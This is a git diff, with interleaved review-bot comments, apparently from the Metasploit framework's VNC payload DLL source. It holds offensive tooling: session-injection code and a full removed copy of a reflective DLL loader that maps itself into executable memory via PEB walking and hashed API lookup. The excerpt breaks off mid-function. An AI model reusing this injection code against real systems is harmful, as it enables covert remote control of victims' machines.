rename from external/source/vncdll/loader/loader.h
rename to external/source/vncdll/vncdll/loader.h
diff --git a/external/source/vncdll/vncdll/loader.rc b/external/source/vncdll/vncdll/loader.rc
new file mode 100755
index 0000000000..d4f53181d0
--- /dev/null
+++ b/external/source/vncdll/vncdll/loader.rc
@@ -0,0 +1,18 @@
+
+#ifdef _X64_
+
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
+#endif
+
+#else
+
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
+#endif
+
+#endif
\ No newline at end of file
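Review bot: The new `#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"` compiles a whole source file into loader.c, yet it sits below the `VNCFLAG_*` defines with no comment explaining why. The winvnc copy of ReflectiveLoader.c that this diff deletes set `REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` and `REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN` inside the file itself. Where the shared copy gets those switches is not visible in this hunk, so it is worth confirming they are defined before this line. I would add a comment above the include such as `// ReflectiveLoader.c is compiled into this translation unit; its REFLECTIVEDLLINJECTION_* switches must be defined before this point`.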
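Review bot: In loader_inject_pre the result of `_snprintf_s` is discarded, so a truncated command line would still be passed on carrying a clipped address. Testing the result, for example `if( _snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, _TRUNCATE, "/v /c:0x%p", lpMemory ) < 0 ) break;` with the function's error code set first, would stop that; the rest of the function, including how errors are reported, is outside the hunk. The `08` in `%08p` adds nothing on MSVC, whose `%p` already zero-pads to pointer width, and the `0` flag is undefined for `p` in ISO C. On x64 the argument now carries 16 hex digits, so whatever parses `/c:` must read a pointer-sized value; that parser is not part of this hunk.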
diff --git a/external/source/vncdll/loader/ps.c b/external/source/vncdll/vncdll/ps.c
similarity index 100%
rename from external/source/vncdll/loader/ps.c
rename to external/source/vncdll/vncdll/ps.c
diff --git a/external/source/vncdll/loader/ps.h b/external/source/vncdll/vncdll/ps.h
similarity index 100%
rename from external/source/vncdll/loader/ps.h
rename to external/source/vncdll/vncdll/ps.h
diff --git a/external/source/vncdll/loader/session.c b/external/source/vncdll/vncdll/session.c
old mode 100644
new mode 100755
similarity index 93%
rename from external/source/vncdll/loader/session.c
rename to external/source/vncdll/vncdll/session.c
index 93d60aa471..c95cf7c11f
--- a/external/source/vncdll/loader/session.c
+++ b/external/source/vncdll/vncdll/session.c
@@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
 {
 if( !pProcessIdToSessionId )
 {
- hKernel = LoadLibrary( "kernel32.dll" );
+ hKernel = LoadLibraryA( "kernel32.dll" );
 if( hKernel )
 pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
 }
@@ -53,7 +53,7 @@ DWORD session_activeid()
 {
 if( !pWTSGetActiveConsoleSessionId )
 {
- hKernel = LoadLibrary( "kernel32.dll" );
+ hKernel = LoadLibraryA( "kernel32.dll" );
 if( hKernel )
 pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
 }
@@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
 CloseHandle( hToken );
 }
- hKernel = LoadLibrary( "kernel32" );
+ hKernel = LoadLibraryA( "kernel32" );
 if( !hKernel )
 break;
diff --git a/external/source/vncdll/loader/session.h b/external/source/vncdll/vncdll/session.h
similarity index 100%
rename from external/source/vncdll/loader/session.h
rename to external/source/vncdll/vncdll/session.h
diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj b/external/source/vncdll/vncdll/vncdll.vcxproj
new file mode 100755
index 0000000000..d97cda4a84
--- /dev/null
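Review bot: All three hunks (session_id, session_activeid, session_inject) load kernel32 a second time just to resolve an export, and no matching FreeLibrary is visible in them, so the extra module reference is never dropped as far as these lines show. kernel32 is already mapped in the calling process, so `hKernel = GetModuleHandleA( "kernel32.dll" );` returns the same handle without touching the reference count or the loader's search. The third hunk also spells the name `"kernel32"` while the first two use `"kernel32.dll"`; one spelling throughout is easier to grep. Each function continues outside its hunk.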
+++ b/external/source/vncdll/vncdll/vncdll.vcxproj 
@@ -0,0 +1,245 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD} + vncdll + Win32Proj + + + + DynamicLibrary + v120_xp + false + MultiByte + true + + + DynamicLibrary + v120_xp + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + true + + + DynamicLibrary + v120_xp + MultiByte + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>12.0.21005.1 + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + false + false + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + false + false + $(ProjectName).$(PlatformShortName) + + + + Disabled + WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + EditAndContinue + + + true + Windows + MachineX86 + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + X64 + + + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + ProgramDatabase + + + true + Windows + MachineX64 + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + + + _X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 
"$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + MaxSpeed + true + WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + MultiThreaded + true + + Level3 + ProgramDatabase + CompileAsC + + + _USING_V110_SDK71_;%(PreprocessorDefinitions) + + + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + Windows + true + true + false + false + MachineX86 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\" + + + + + X64 + + + MaxSpeed + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + MultiThreaded + true + + Level3 + ProgramDatabase + CompileAsC + + + _X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + Windows + true + true + false + false + MachineX64 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\" + + + + + + + + + + + + + + + + + + + + + + + {ea6a09ac-04bb-423d-8842-ca48df901058} + false + + + + + + \ No newline at end of file diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj.filters b/external/source/vncdll/vncdll/vncdll.vcxproj.filters new file mode 100755 index 0000000000..b4f067d299 --- /dev/null +++ b/external/source/vncdll/vncdll/vncdll.vcxproj.filters 
@@ -0,0 +1,65 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {7c56685d-83b5-4541-b5dd-a620ffe19b23} + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {6b6dd5ba-1f40-449f-a55b-7180bb0793a0} + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav + + + + + Source Files + + + Source Files + + + Source Files\core + + + Source Files\core + + + Source Files\core + + + Source Files\core + + + + + Header Files + + + Header Files + + + Header Files\core + + + Header Files\core + + + Header Files\core + + + + + Resource Files + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h b/external/source/vncdll/winvnc/ReflectiveDLLInjection.h deleted file mode 100644 index d41b2ac323..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h +++ /dev/null 
@@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.c b/external/source/vncdll/winvnc/ReflectiveLoader.c deleted file mode 100644 index 9d69369824..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveLoader.c +++ /dev/null 
@@ -1,457 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#ifdef _WIN64 -#pragma intrinsic( _ReturnAddress ) -UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); } -#endif -//===============================================================================================// - -/* - * Use Reflective DLL Injection. - */ -#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. 
- -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA; - GETPROCADDRESS pGetProcAddress; - VIRTUALALLOC pVirtualAlloc; - USHORT usCounter; - - // the initial location of this image in memory - UINT_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - UINT_PTR uiBaseAddress; - - // variables for processing the kernels export table - UINT_PTR uiAddressArray; - UINT_PTR uiNameArray; - UINT_PTR uiExportDir; - UINT_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - UINT_PTR uiHeaderValue; - UINT_PTR uiValueA; - UINT_PTR uiValueB; - UINT_PTR uiValueC; - UINT_PTR uiValueD; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our current EIP -#ifdef _WIN64 - uiLibraryAddress = eip(); -#else - __asm call geteip - __asm geteip: pop uiLibraryAddress -#endif - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. 
- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else - uiBaseAddress = __readfsdword( 0x30 ); -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - // compute the hash of the module name... 
- do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - break; - } - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // 
store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA ); - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. 
- while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD ); - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the 
address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( UINT_PTR ); - if( uiValueD ) - uiValueD += sizeof( UINT_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... 
- - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! 
- if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: process the images exception directory if it has one (PE32+ for x64) -/* - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ]; - // check if their are any exception etries present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // get the number of entries - uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - - // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all entries - while( uiValueA-- ) - { - //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress - - // get the next entry - uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - } - } -*/ - // STEP 7: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // call our respective entry point, fudging our hInstance value -#ifdef 
